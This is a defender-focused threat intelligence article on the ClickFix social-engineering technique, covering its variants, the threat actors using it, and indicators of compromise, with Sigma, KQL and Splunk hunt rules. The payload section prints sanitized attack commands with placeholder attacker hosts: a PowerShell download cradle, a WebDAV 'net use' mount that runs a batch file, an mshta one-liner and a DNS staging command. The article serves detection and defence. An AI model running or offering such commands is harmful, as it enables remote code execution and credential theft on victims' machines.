ClickFix IOCs: What Defenders Need to Hunt Right Now

ClickFix is not a single piece of malware. It is a delivery mechanism — a social engineering technique that hijacks the human impulse to follow on-screen instructions, weaponizes the Windows clipboard, and deposits malicious payloads without touching a file on disk until the victim does it themselves. Since its first documented observation in March 2024, it has been adopted by ransomware operators, state-sponsored groups from North Korea, Iran, and Russia, and commodity crimeware actors at scale. By mid-2025, it accounted for 47% of observed initial access methods according to Microsoft's 2025 Digital Defense Report — and ESET recorded a 517% surge in detections from late 2024 to mid-2025. This article compiles the concrete indicators of compromise defenders need to detect, hunt, and block it — including the variants that postdate most published guidance.

The term "ClickFix" first gained traction in security research around late 2023 and accelerated into mainstream threat intelligence reporting through 2024 and into 2026. Proofpoint researchers formally documented the technique in May 2024, describing it as a social engineering tactic that presents users with a fake error or CAPTCHA prompt and then instructs them to copy a PowerShell command — pre-loaded into the clipboard by malicious JavaScript — and paste it into a Run dialog or terminal. The name derives from the lure framing: the victim is told they need to "fix" something by clicking and following steps. Threat actors immediately recognized the value: by late 2024, ClickFix builders were being sold on dark web forums, allowing operators with no development skill to generate ready-made weaponized landing pages.

What makes ClickFix particularly corrosive to traditional defenses is that no file is written by the attacker. The attacker writes JavaScript into a webpage. The webpage writes a command into the Windows clipboard. The user types Win+R, pastes the command, and hits Enter. At that moment, the user — not the attacker — has executed the payload. Many endpoint detection and response platforms that watch for suspicious process creation from browser processes will miss this entirely, because the parent process is explorer.exe or cmd.exe, exactly as legitimate administrative activity looks. As Unit 42 researchers note, the technique abuses "procedural trust" — the victim follows instructions that resemble familiar IT troubleshooting steps, which is precisely why automation alone cannot stop it.

How ClickFix Works

The kill chain is compact and consistent across observed campaigns. A user lands on a compromised or attacker-controlled web page. The page renders a modal overlay — often styled to mimic Microsoft, Google Chrome, Cloudflare, DocuSign, or a document-sharing service — declaring that an error has occurred, that a browser extension is missing, that a CAPTCHA must be completed, or that a document cannot display without a "font fix." The modal instructs the user to press Win+R to open the Windows Run dialog, then to press Ctrl+V to paste, and then to hit Enter.

The JavaScript executing in the background has already written a PowerShell one-liner to the clipboard. When the user pastes and executes it, the command typically reaches out to an attacker-controlled domain to download a second-stage payload. In some variants, the full payload is Base64-encoded and embedded directly in the clipboard string, eliminating the need for a secondary network request at execution time. A refinement observed in 2025 embeds long blank space before the malicious command in the clipboard string — so the visible portion of the pasted text looks harmless, hiding the actual payload from casual inspection.

ClickFix Kill Chain Select a stage to expand
01
Lure Delivery
Attacker
02
Clipboard Poisoning
JS in browser
03
User Execution
Victim
04
C2 Beacon / Stage 2
Payload
05
Persistence / Exfil
Post-exploitation
06
Anti-Forensics
Cleanup
Lure Delivery
User lands on a compromised or purpose-built webpage. The page renders a convincing modal overlay — fake CAPTCHA, fake browser error, fake Microsoft update — prompting the user to take action to "fix" a problem. Lures have impersonated Google Chrome, Microsoft Word, Cloudflare, DocuSign, and even the US Social Security Administration.
Detection layer: URL reputation, newly registered domains (<30 days), Cloudflare Pages abuse patterns
Why it evades controls: No malicious file is delivered at this stage — only a legitimate-looking web page. Email gateways and file-based sandboxes have no signal to act on.
Defender Note

ClickFix bypasses many email security gateways and file-based sandbox tools because the initial delivery is a URL or a compromised page — not an attachment. The malicious "file" is the command already in your clipboard. Detection must happen at the process execution layer — specifically in EDR telemetry watching for process creation events — not at the file-delivery layer.

Observed clipboard payloads follow a small set of structural patterns. The classic form is a PowerShell.exe invocation with -ExecutionPolicy Bypass, -WindowStyle Hidden, and -EncodedCommand or an IEX (Invoke-Expression) calling a remote URL. Some campaigns use mshta.exe instead of PowerShell, particularly when lures are staged on pages imitating Windows Update or Office activation prompts. A minority of observed variants use wscript.exe or cscript.exe to execute a VBScript payload. A newer DNS-based staging variant — disclosed by Microsoft Threat Intelligence in February 2026 — routes the initial command through cmd.exe and performs a DNS lookup against a hard-coded external DNS server. The DNS response itself carries the second-stage payload, using DNS as a signaling channel rather than a web request, which helps the activity blend into normal network traffic.

# Representative ClickFix clipboard payload structures (sanitized)

# Classic PowerShell encoded form
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -NoProfile -EncodedCommand [Base64_blob]

# IEX download cradle form
powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('hxxps://[C2_domain]/[path]')"

# mshta variant — observed in Lumma Stealer and AsyncRAT campaigns
mshta "javascript:a=new ActiveXObject('WScript.Shell');a.Run('powershell ...',0);close()"

# WebDAV net use variant — new March 2026, evades PowerShell-focused EDR rules
"cmd.exe" /c net use Z: https://[attacker_IP]/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete

# DNS-based staging variant — February 2026
cmd.exe /c nslookup -type=TXT [attacker_domain] [hardcoded_DNS_server] | findstr "Name:" | [execution_logic]

ClickFix Variants: FileFix, CrashFix, TerminalFix, WebDAV, JackFix, ConsentFix, and GlitchFix

By mid-2025 the original ClickFix pattern had spawned a family of variants sharing the same core mechanic — clipboard poisoning and social engineering — but differing in how they instruct the victim to execute the payload, where execution happens, and what evidence they leave behind. Defenders who built detections only around the explorer.exe → powershell.exe parent-child chain will miss several of these. Some variants leave no endpoint footprint at all.

First Observed
March 2024
Execution Vector
Win+R / Run dialog
Registry Artifact
RunMRU
Detection Gap
Well-covered by RunMRU + explorer.exe rules

The original form. A fake error or CAPTCHA modal writes a PowerShell command to the Windows clipboard via JavaScript. The user presses Win+R, Ctrl+V, Enter. Every command run through Win+R is written to the RunMRU registry key, providing a reliable forensic artifact even if the process chain is missed by EDR. The classic variant is the most-documented and has the most mature detection coverage.

Primary IOC — process chain
ParentImage: \explorer.exe → Image: \powershell.exe CommandLine|contains: -ExecutionPolicy Bypass -WindowStyle Hidden
First Observed
June 23, 2025
Execution Vector
File Explorer address bar
Registry Artifact
TypedPaths (not RunMRU)
Detection Gap
Misses RunMRU-only detections

Introduced by researcher mr.d0x. A webpage uses an HTML file-input element to open Windows File Explorer, and silently loads a malicious command into the clipboard. The victim pastes into the Explorer address bar instead of the Run dialog — executing through the browser process rather than explorer.exe. Criminal groups were testing FileFix in live campaigns less than two weeks after its public disclosure. The registry artifact is TypedPaths, not RunMRU — detections built only on RunMRU monitoring will not catch it.

Primary IOC — registry artifact
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths Alert on entries that are not filesystem paths — any PowerShell syntax or URL is anomalous
Threat Cluster
KongTuke
Execution Vector
Malicious browser extension
Novel LOLBin
finger.exe
Detection Gap
finger.exe rarely monitored; no RunMRU artifact

A malicious browser extension intentionally crashes the victim's browser, then displays a fake recovery prompt. The extension abuses finger.exe — a decades-old, still-present Windows utility — to retrieve a large obfuscated PowerShell blob without writing to disk. On domain-joined systems the chain escalates further, deploying a portable WinPython environment and ModeloRAT via registry Run keys and scheduled tasks. Documented by Microsoft and Trend Micro in campaigns attributed to KongTuke.

Primary IOC — LOLBin abuse
Image: \finger.exe CommandLine|contains: external IP or domain argument Followed by: \powershell.exe with encoded payload
First Observed
March 2025
Execution Vector
Win+X → Windows Terminal
Registry Artifact
None — no RunMRU write
Detection Gap
Bypasses explorer.exe parent chain; no RunMRU

Directs victims to open PowerShell or Windows Terminal directly via Win+X on Windows 11 rather than Win+R. Campaigns distributing Havoc C2 used this variant in March 2025. Because the user launches PowerShell manually, the parent process is the terminal host itself — not explorer.exe — bypassing detections anchored to that parent relationship. Leaves no RunMRU artifact. Microsoft confirmed in March 2026 that attackers are using Win+X specifically to sidestep user training focused on the Run dialog.

Primary IOC — parent process
ParentImage: \wt.exe (Windows Terminal) Image: \powershell.exe CommandLine|contains: -EncodedCommand OR Base64/hex-encoded args No RunMRU artifact — hunt process tree only
Identified
March 2026 (Atos)
Execution Vector
net use / WebDAV mount
Registry Artifact
RunMRU (cmd.exe string)
Detection Gap
Bypassed Defender for Endpoint in confirmed incident

Replaces PowerShell with net use — a native Windows networking command — to mount a remote WebDAV share and execute a batch file from it. The drive mapping is removed immediately after execution, leaving minimal forensic evidence. In the observed March 2026 campaign this bypassed Microsoft Defender for Endpoint and was only caught by targeted threat hunting on RunMRU artifacts. Final payload was ModeloRAT delivered via a trojanized WorkFlowy application.

Primary IOC — network + registry
cmd.exe /c net use Z: https://[IP]/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete RunMRU entry containing 'net use' pointing to external IP Outbound WebDAV (port 443/80) from cmd.exe or net.exe
Documented
Late 2025 (Acronis)
Execution Vector
Win+R — inside fake lock screen
Registry Artifact
RunMRU (same as Classic)
Detection Gap
Detection surface same as Classic ClickFix

Takes the psychological pressure considerably further. Victims are lured via malvertising to fake adult sites; on interaction, the page goes full-screen and displays a fake Windows screen-lock overlay demanding identity verification to regain access. The Run dialog is surfaced inside the fake lock screen, and victims paste and execute under the belief they are unlocking their computer. Engineered to overwhelm hesitation by creating urgency and panic — the psychological conditions in which people stop questioning instructions. Detection surface is identical to classic ClickFix.

Primary IOC — same as Classic
ParentImage: \explorer.exe → Image: \powershell.exe RunMRU write with PowerShell payload Lure vector: malvertising → fake adult site → fullscreen overlay
Documented
December 2025 (Push Security)
Execution Vector
Browser only — no process spawned
Registry Artifact
None
Detection Gap
Endpoint detection is completely blind

Architecturally distinct from every other variant. No command executes on the endpoint. No process is spawned. No registry key is written. The attack exploits the OAuth 2.0 authorization code flow — the victim is tricked into pasting a localhost URL containing an Azure CLI OAuth authorization code into an attacker-controlled site. Because Azure CLI is a native Microsoft application, third-party OAuth mitigations do not apply. The attacker captures the code, exchanges it for a token, and gains persistent Microsoft account access without phishing a password or triggering MFA. Detection must happen at the identity layer.

Primary IOC — identity layer
Monitor: Azure CLI login events from non-developer / non-admin users Alert: OAuth authorization code exchanges from unexpected IPs or user agents Hunt: Microsoft Entra sign-in logs for Azure CLI app ID from anomalous locations
Documented
January 2026 (ErrTraffic TDS)
Execution Vector
SyncAppvPublishingServer.vbs proxy
Registry Artifact
RunMRU
Detection Gap
Signed Microsoft LOLBin bypasses direct PowerShell rules

Delivered through the ErrTraffic traffic distribution system, which injects JavaScript into compromised websites causing visible page glitches, then prompts users to run a command to restore rendering. Sold as a service — operators with no development capability can purchase access and customize lure type per visitor segment. Some observed chains abuse SyncAppvPublishingServer.vbs — a signed Microsoft App-V script — as a proxy execution layer to avoid direct PowerShell invocation. Delivered Lumma Stealer and Amatera Stealer through early 2026.

Primary IOC — LOLBin proxy
Image: SyncAppvPublishingServer.vbs executing PowerShell with encoded payload Alert on SyncAppvPublishingServer.vbs used to execute arbitrary PowerShell — not just PowerShell launched directly from explorer.exe
macOS Is Now a Target — Including Fileless Variants

ClickFix was historically a Windows-focused technique, but 2025 brought confirmed campaigns targeting macOS, and 2026 has brought increasing sophistication to those campaigns. Sophos X-Ops and CloudSEK documented macOS campaigns delivering Atomic macOS Stealer (AMOS) via fake Cloudflare verification and fake GitHub installation interfaces. These campaigns instruct macOS users to open Terminal and paste a shell command rather than using Win+R. The technique bypasses Gatekeeper and XProtect because the user — not an unsigned binary — initiates execution. Sophos researchers found that one campaign's tracking infrastructure reported real-time victim click counts to an attacker-controlled Telegram bot, with comments in Russian in the malicious script source.

A more recent macOS variant, dubbed Matryoshka, escalates the evasion further. Documented in February 2026, it begins with typosquatting — attackers register domains that closely mimic legitimate sites — and the delivered shell script operates entirely in memory, fetching a rogue shell script from an external server that then decodes and executes additional stages without writing to disk. The infection chain uses API-gated communications, meaning the C2 only responds to traffic that meets specific criteria, complicating automated sandbox analysis. The final payload exfiltrates credentials from 203 browser wallet extensions and 18 desktop cryptocurrency wallet applications. The macOS threat surface for ClickFix is no longer limited to a single stealer family delivered through a single lure type — and "Macs don't get viruses" is no longer an acceptable security posture for any organization with macOS endpoints.

Threat Actors Using ClickFix

By mid-2024, ClickFix had transitioned from a niche technique to what Proofpoint described as "a very popular social engineering technique used by multiple threat actors." The adoption curve has been steep and the actor list has grown to span criminal, espionage, and ransomware operators across at least four nation-state alignments.

ClickFix is not reinventing nation-state campaigns — it is slotting into the installation and execution stages of chains that already existed. That makes the execution layer the only detection chokepoint that holds across every actor using it.

Based on Proofpoint Threat Research, April 2025
TA571 / ClearFake
Criminal
Also: SocGholish-adjacent infrastructure
First documented ClickFix operators. TA571 is a high-volume spam operator; ClearFake compromises legitimate WordPress sites and injects JavaScript replacing page content with fake browser update lures.

Proofpoint documented TA571 and ClearFake delivering AsyncRAT, DarkGate, Matanbuchus, NetSupport RAT, and Lumma Stealer via ClickFix as early as May 2024. ClearFake infrastructure remained active as of early 2026, with Trend Micro's March 2026 KongTuke investigation identifying the same WordPress injection pattern. The ClearFake cluster represents the democratization phase — commodity access sold via builders on dark web forums by late 2024.

AsyncRAT DarkGate Lumma NetSupport
Kimsuky / TA427
DPRK
APT43 (Mandiant), Emerald Sleet (Microsoft)
Adopted ClickFix January–February 2025 targeting think tanks focused on North Korean policy. Spoofed Japanese diplomats to establish trust before directing targets to attacker-controlled sites.

The Kimsuky infection chain executed PowerShell, VBScript, and batch scripts in sequence, delivering QuasarRAT while displaying a decoy PDF to avoid suspicion. All infrastructure was newly registered as of January 2025 and largely hosted on compromised South Korean systems using dynamic DNS. A VBScript scheduled task set to run at 19-minute intervals is a high-fidelity Kimsuky-specific IOC confirmed by Proofpoint's April 2025 "Around the World in 90 Days" report.

QuasarRAT Espionage 19-min task
MuddyWater / TA450
Iran (MOIS)
Mango Sandstorm (Microsoft)
Used ClickFix November 13–14, 2024 — timed to Microsoft's Patch Tuesday — against 39+ organizations in the Middle East, impersonating a Microsoft security update notification.

Targets who followed ClickFix instructions executed a PowerShell script with administrator privileges that installed Level, a legitimate remote monitoring and management tool subsequently used for persistent access and surveillance. The attacker sending domain was support@microsoftonlines[.]com. The timing against Patch Tuesday demonstrates operational awareness of when targets are most likely to accept security-themed prompts as legitimate.

Level RMM Patch Tuesday timing Middle East
APT28 / TA422
Russia (GRU)
Sofacy, Fancy Bear
Observed October 17, 2024 using a Google Sheets-themed phishing lure leading to a reCAPTCHA prompt. Executed PowerShell created an SSH tunnel and launched Metasploit modules.

Separate Russian-affiliated group UNK_RemoteRogue ran a December 2024 campaign against defense-sector targets, exploiting compromised Zimbra mail servers. Lures mimicked a Microsoft Word page and included a fake YouTube tutorial for credibility, with the executed PowerShell payload establishing communication with an Empire C2 server. Russia-linked COLDRIVER used ClickFix to deploy BAITSWITCH and SIMPLEFIX against dissidents and civil society, with observed cleanup including RunMRU registry key deletion to remove forensic evidence — mapped to T1070.003.

Metasploit Empire C2 COLDRIVER RunMRU cleanup
LeakNet
Ransomware
Scattered Spider affiliate activity (ReliaQuest, 2025–2026)
Adopted ClickFix as primary initial access by 2026. Delivers through compromised legitimate websites to avoid new-domain signals. Post-exploitation chain uses Deno-based loader and EtherHiding blockchain C2.

LeakNet's chain involves jli.dll side-loading into Java, PsExec-based lateral movement, and S3 bucket payload staging. Their Deno-based loader executes Base64-encoded JavaScript almost entirely in memory — Deno is treated as safe developer tooling by file-based controls. VBScript and PowerShell scripts named Romeo*.ps1 and Juliet*.vbs install the legitimate Deno runtime and use it to run malicious code. EtherHiding encodes next-stage payload retrieval in Binance BNB Smart Chain smart contracts, making domain-based blocking useless at the C2 layer.

Deno loader EtherHiding Ransomware DLL side-load
Lumma MaaS Ecosystem
Criminal
LummaC2; multiple operators via MaaS model
Highest-volume ClickFix activity. Hundreds of campaigns through 2024–2025 using fake CAPTCHA pages. ClickFix facilitated delivery of 59% of top malware families tracked in 2025 (ReliaQuest Annual Report).

In May 2025, law enforcement seized over 2,300 Lumma Stealer domains in a coordinated disruption. ClickFix was also the primary delivery vector for Latrodectus, MintsLoader, NetSupport RAT, AsyncRAT, and the banking-focused Lampion infostealer. A June 2025 campaign impersonated the US Social Security Administration to deliver ScreenConnect. CIS reported ClickFix comprised over a third of all non-malware Albert Network Monitoring alerts in H1 2025, including Interlock ransomware delivery against a SLTT government target.

LummaC2 Latrodectus Interlock MintsLoader

IOC Categories and Examples

The reliable ClickFix indicators do not change when infrastructure rotates. Build detections on behavioral patterns, not domain block lists.

Consistent finding across Proofpoint, Unit 42, Huntress, and Microsoft Threat Intelligence research

Indicators of compromise for ClickFix fall into several distinct categories. Because infrastructure rotates rapidly, network-based IOCs have a shorter useful life than behavioral IOCs. The highest-fidelity detection comes from process and command-line telemetry and registry artifacts, not from domain block lists.

Behavioral IOCs (Highest Fidelity)

The reliable ClickFix indicators are behavioral patterns at the process execution layer. These do not change when infrastructure rotates, and they persist across variants.

Indicator Type Notes
explorer.exe → powershell.exe with -EncodedCommand Process PowerShell launched from explorer.exe (Win+R Run dialog) with encoded payload — primary ClickFix execution signature
explorer.exe → mshta.exe with javascript: URI Process mshta used as a PowerShell bypass; seen in Lumma and AsyncRAT campaigns
-ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive Cmdline Consistent flag combination across ClickFix campaigns; rarely seen in legitimate admin use launched from Run dialog
IEX(New-Object Net.WebClient).DownloadString( Cmdline Classic download cradle; ClickFix frequently uses this or DownloadFile variant in the clipboard command
cmd.exe /c net use [letter]: https://[IP]/webdav Cmdline WebDAV net use variant — new as of March 2026; bypassed Defender for Endpoint in observed campaign. Followed immediately by batch file execution and drive deletion.
cmd.exe /c powershell [hidden flags] launched from explorer.exe Process Some variants wrap PowerShell in a cmd shell to add one layer of obfuscation
wscript.exe or cscript.exe with .vbs from %TEMP% or %APPDATA% Process VBScript variant; less common but observed in campaigns impersonating Office activation
finger.exe invoked with an external IP or domain argument Process CrashFix variant; finger.exe retrieves obfuscated PowerShell payload from attacker server without a standard HTTP request
Clipboard content containing powershell and -enc or -EncodedCommand at browser session time Clipboard Some EDR solutions can inspect clipboard contents; a PowerShell encoded command in clipboard during active browsing is a strong signal
nslookup with hardcoded non-system DNS server, output piped through findstr for execution Cmdline DNS-based staging variant identified by Microsoft in February 2026; uses DNS TXT records to deliver the second-stage payload
wt.exe (Windows Terminal) spawning powershell.exe with encoded or hex-encoded arguments Process TerminalFix / Win+X variant; bypasses detections anchored to explorer.exe as parent. No RunMRU artifact is written. Alert on wt.exe as parent for suspicious PowerShell activity.
SyncAppvPublishingServer.vbs executing PowerShell with encoded payload Process GlitchFix / Amatera Stealer campaigns (2026); abuses a signed Microsoft App-V script as a LOLBin proxy to conceal direct PowerShell invocation from standard detection rules

Registry Forensic IOCs — RunMRU and TypedPaths

A critical and underutilized detection surface for ClickFix is the Windows Run dialog history registry key. Every command executed through Win+R is written to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Hunting this key for PowerShell invocations, net use commands pointing to external IPs, or mshta with javascript: URIs provides a reliable forensic trail. Defenders should also alert on deletion of this key — mapped to T1070.003 — since COLDRIVER and other actors have been observed wiping it post-execution to cover their tracks.

For FileFix, the equivalent artifact is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths, which records what the user typed into File Explorer's address bar. A PowerShell or web request command appearing in TypedPaths is highly anomalous and a strong indicator of FileFix execution.

Registry Key Variant Hunting Guidance
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ClickFix Alert on entries containing: powershell, mshta, cmd, net use with external IPs, or any value with http:// or https:// strings
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths FileFix Alert on entries that are not filesystem paths — any PowerShell syntax or URL is anomalous in this key
reg.exe delete targeting RunMRU (T1070.003) Cleanup Deletion of RunMRU is a strong post-execution indicator; rarely done by legitimate processes. Attributed to COLDRIVER and other APT actors.

Network IOCs (Moderate Fidelity, Rotate Frequently)

Specific domains and IPs from ClickFix campaigns have limited shelf lives — infrastructure is typically stood up for a campaign and abandoned within days to weeks. The following patterns are drawn from published threat research; defenders should treat domain and IP IOCs as ephemeral and prioritize detection logic over block lists.

Infrastructure Note

ClickFix C2 domains frequently use newly registered domains (under 30 days old), abuse free hosting services such as GitHub Pages or Cloudflare Pages for the initial lure stage, and use Cloudflare as a proxy layer, making IP-based blocking largely ineffective for the lure delivery tier. LeakNet specifically shifted to delivery via compromised legitimate websites rather than attacker-owned infrastructure specifically to avoid new-domain detection signals. The payload-download tier shows more stable patterns in URL path structure, and the WebDAV and DNS variants add further layers that avoid standard HTTP-based detection.

URL path patterns observed across ClickFix campaigns include short alphanumeric paths under /d/, /dl/, /s/, or /get/ prefixes, often serving PowerShell scripts with .ps1 extensions or extensionless responses with text/plain content type. Some campaigns used GitHub raw content URLs (raw.githubusercontent.com) to host the second-stage script, a technique that complicates domain-based blocking. A Rapid7-documented campaign active since December 2025 weaponized over 250 compromised WordPress sites across 12 countries as lure delivery infrastructure, including a U.S. Senate candidate's official webpage.

Pattern / Example Type Campaign Association
hxxps://raw.githubusercontent[.]com/[user]/[repo]/main/[script].ps1 URL Lumma Stealer, AsyncRAT campaigns; GitHub as anonymous hosting
Newly registered .top, .xyz, .online, .site TLDs with captcha- or verify- prefixes Domain Pattern Broad ClickFix campaigns; fake CAPTCHA delivery
verify-human[.]pages[.]dev, check-browser[.]pages[.]dev (pattern) Domain Pattern Cloudflare Pages abuse for lure delivery; observed 2024
Domains registered via Namecheap or Porkbun with privacy protection, age <14 days Domain Attr Consistent across multiple campaigns; useful for proactive blocking of new infrastructure
HTTP GET to /[4-8 char random string].ps1 returning text/plain with IEX content URL Pattern Second-stage download; high-confidence ClickFix payload delivery
AS202425 (IP Volume Inc.), AS9370 (Sakura Internet) hosting C2 ASN Commonly abused hosting ASNs in ClickFix infrastructure; useful for enrichment and risk scoring
mein-lonos-cloude[.]de (Storm-0426 campaign, March 2025) Domain Attacker-controlled site used in MintsLoader campaign targeting German users; delivered via Prometheus TDS
Outbound WebDAV connections (port 443/80) to residential or VPS IPs from cmd.exe or net.exe Network WebDAV net use variant; net use connections to external IPs are anomalous in most enterprise environments

Registry and Persistence IOCs

When ClickFix delivers a stealer like Lumma, persistence is often not established — the goal is data exfiltration in a single session. When it delivers a RAT, loader, or ransomware precursor, persistence mechanisms follow predictable patterns.

Indicator Type Associated Payload
HKCU\Software\Microsoft\Windows\CurrentVersion\Run — entries pointing to %APPDATA% executables Registry AsyncRAT, NetSupport RAT, ModeloRAT persistence
Scheduled task with name resembling system tasks (e.g., "MicrosoftUpdateHelper", "ChromeUpdater") Scheduled Task DarkGate, Matanbuchus, QuasarRAT (Kimsuky) persistence
Scheduled VBScript task set to run at 19-minute intervals Scheduled Task Kimsuky (TA427) ClickFix campaign — documented by Proofpoint, April 2025
%APPDATA%\[random 8-char string]\[random].exe — new PE in Roaming with no digital signature File General ClickFix payload drop location
%TEMP%\[random].vbs or [random].js executed on first run, then deleted File Intermediate dropper; often cleaned up after payload execution
LNK file in Startup folder pointing to PowerShell File Observed in some NetSupport RAT deployments via ClickFix
Portable WinPython environment in non-standard path (e.g., %APPDATA%\WinPython) File CrashFix / KongTuke variant delivering ModeloRAT
jli.dll loaded into java.exe from USOShared directory File LeakNet post-exploitation chain — DLL side-loading as noted by ReliaQuest, 2026

Detection Rules and Hunt Queries

The following detection logic is based on patterns documented across Proofpoint, Huntress, Unit 42, Atos, Microsoft Threat Intelligence, and Trend Micro research. These are starting points for tuning, not production-ready rules — they will generate noise in environments with active PowerShell-based administration. Baseline your environment before deploying them broadly.

Sigma Rule: ClickFix PowerShell Execution from Run Dialog

title: ClickFix PowerShell Execution via Windows Run Dialog
id: [assign your own GUID]
status: experimental
description: >
  Detects PowerShell launched from explorer.exe (Windows Run dialog)
  with flags commonly used in ClickFix clipboard-injected commands.
author: NoHackie
references:
  - https://www.proofpoint.com/us/blog/threat-insight/clipboard-hijacking-clickfix
  - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\explorer.exe'
    Image|endswith: '\powershell.exe'
    CommandLine|contains|all:
      - '-ExecutionPolicy'
      - 'Bypass'
      - '-WindowStyle'
      - 'Hidden'
  condition: selection
falsepositives:
  - Legitimate admin scripts launched manually via Run dialog
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1204.002

Sigma Rule: mshta with JavaScript URI from Explorer

title: ClickFix mshta JavaScript URI Execution
id: [assign your own GUID]
status: experimental
description: >
  Detects mshta.exe launched from explorer.exe with a javascript: URI,
  consistent with ClickFix variants that avoid direct PowerShell invocation.
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\explorer.exe'
    Image|endswith: '\mshta.exe'
    CommandLine|contains: 'javascript:'
  condition: selection
falsepositives:
  - Rare; mshta with javascript URI from explorer has very limited legitimate use
level: high
tags:
  - attack.execution
  - attack.t1218.005

Sigma Rule: RunMRU Registry Contains Suspicious Command

title: ClickFix Execution Pattern via RunMRU Registry Write
id: [assign your own GUID]
status: experimental
description: >
  Detects writes to the RunMRU registry key containing indicators of 
  ClickFix-style command execution — URLs, PowerShell, mshta, net use, 
  or cmd invocations that are anomalous in the Run dialog context.
  Covers ClickFix and WebDAV net use variants.
references:
  - https://detection.fyi/sigmahq/sigma/windows/registry/registry_set/registry_set_potential_clickfix_execution/
  - https://atos.net/en/lp/cybershield
logsource:
  category: registry_set
  product: windows
detection:
  selection:
    TargetObject|contains: '\Explorer\RunMRU'
    Details|contains:
      - 'powershell'
      - 'mshta'
      - 'http://'
      - 'https://'
      - 'net use'
      - '-EncodedCommand'
      - 'IEX'
  condition: selection
falsepositives:
  - Extremely rare; these strings have no legitimate use in Run dialog history
level: high
tags:
  - attack.execution
  - attack.t1204.002

Sigma Rule: RunMRU Registry Deletion (Post-Execution Cleanup)

title: RunMRU Registry Key Deletion — ClickFix Anti-Forensics
id: [assign your own GUID]
status: experimental
description: >
  Detects deletion of the RunMRU registry key. Observed in COLDRIVER
  campaigns and other ClickFix actors performing post-execution cleanup
  to remove forensic evidence of Win+R command history.
references:
  - https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_reg_delete_runmru/
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith: '\reg.exe'
    - OriginalFileName: 'reg.exe'
  selection_cli:
    CommandLine|contains|all:
      - ' del'
      - '\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
  condition: all of selection_*
falsepositives:
  - Unknown; this is a high-confidence indicator
level: high
tags:
  - attack.defense-evasion
  - attack.t1070.003

KQL Hunt Query (Microsoft Sentinel / Defender XDR)

// ClickFix: Multi-variant detection covering PowerShell, mshta, net use, and finger.exe
DeviceProcessEvents
| where InitiatingProcessFileName =~ "explorer.exe"
    or (InitiatingProcessFileName =~ "cmd.exe" and ProcessCommandLine has "net use" and ProcessCommandLine has "https://")
| where FileName in~ ("powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "finger.exe", "cmd.exe")
| where ProcessCommandLine has_any (
    "-ExecutionPolicy", "-EncodedCommand", "IEX(New-Object",
    "DownloadString", "javascript:", "net use", "-w hidden"
  )
| project Timestamp, DeviceName, AccountName, FileName,
          ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

// ClickFix: RunMRU registry artifact hunt
DeviceRegistryEvents
| where RegistryKey has "RunMRU"
| where RegistryValueData has_any (
    "powershell", "mshta", "http://", "https://", "net use", "-EncodedCommand", "IEX"
  )
| project Timestamp, DeviceName, AccountName, RegistryKey, RegistryValueName, RegistryValueData
| order by Timestamp desc

Splunk SPL Hunt Query

index=windows sourcetype=WinEventLog:Security OR sourcetype=sysmon
EventCode=4688 OR EventID=1
(ParentImage="*\\explorer.exe" OR (ParentImage="*\\cmd.exe" AND CommandLine="*net use*https*"))
(Image="*\\powershell.exe" OR Image="*\\mshta.exe" OR Image="*\\finger.exe" OR Image="*\\cmd.exe")
(CommandLine="*ExecutionPolicy*Bypass*" OR CommandLine="*EncodedCommand*"
 OR CommandLine="*IEX*DownloadString*" OR CommandLine="*net use*webdav*"
 OR CommandLine="*javascript:*")
| table _time, ComputerName, User, ParentImage, Image, CommandLine
| sort - _time
Tuning Guidance

In environments where IT staff use PowerShell regularly, filter on the parent process more carefully. The key discriminator for classic ClickFix is the parent process being explorer.exe — not a terminal, IDE, or management console. For the Win+X / TerminalFix variant, look at PowerShell sessions with no associated terminal host parent that immediately initiate network connections. For the WebDAV variant, alert on any net use command referencing external IPs or HTTPS URIs. The RunMRU registry hunt is complementary and catches cases where the process chain detection misses due to EDR gaps — Atos researchers confirmed it was the only detection that caught the March 2026 WebDAV variant.

MITRE ATT&CK Mapping

ClickFix and its variants map across multiple MITRE ATT&CK techniques, which is part of what makes it effective — it is genuinely a multi-technique attack chain, not cleanly categorized into a single TTP. The variant landscape adds several mappings not present in 2024-era documentation, and ConsentFix introduces a technique — T1528 (Steal Application Access Token) — that requires identity-layer detection rather than endpoint telemetry.

Technique ID Technique Name ClickFix Application
T1204.002 User Execution: Malicious File User pastes and executes the clipboard payload — execution requires user action and bypasses most automated defenses
T1204.001 User Execution: Malicious Link User clicks a link or lure button that triggers clipboard write; MITRE community now maps ClickFix here as the primary entry point
T1059.001 Command and Scripting Interpreter: PowerShell PowerShell is the primary interpreter used in clipboard payloads across all major campaigns
T1218.005 System Binary Proxy Execution: Mshta mshta.exe variant used to proxy execution and bypass PowerShell-specific detections
T1105 Ingress Tool Transfer PowerShell download cradle retrieves second-stage payload from attacker C2
T1027 Obfuscated Files or Information Base64-encoded command blocks and ROT-cipher obfuscation hide payload content from casual inspection; blank-space padding hides payload from clipboard preview
T1566.002 Phishing: Spearphishing Link Initial delivery via malicious link in email or messaging platform leading to lure page
T1608.004 Stage Capabilities: Drive-by Target Attacker stages lure content on compromised or purpose-built websites
T1140 Deobfuscate/Decode Files or Information PowerShell decodes Base64 payload at runtime before execution
T1021.002 Remote Services: SMB/Windows Admin Shares (via WebDAV) WebDAV net use variant mounts a remote share to deliver and execute a batch file, then removes the mapping
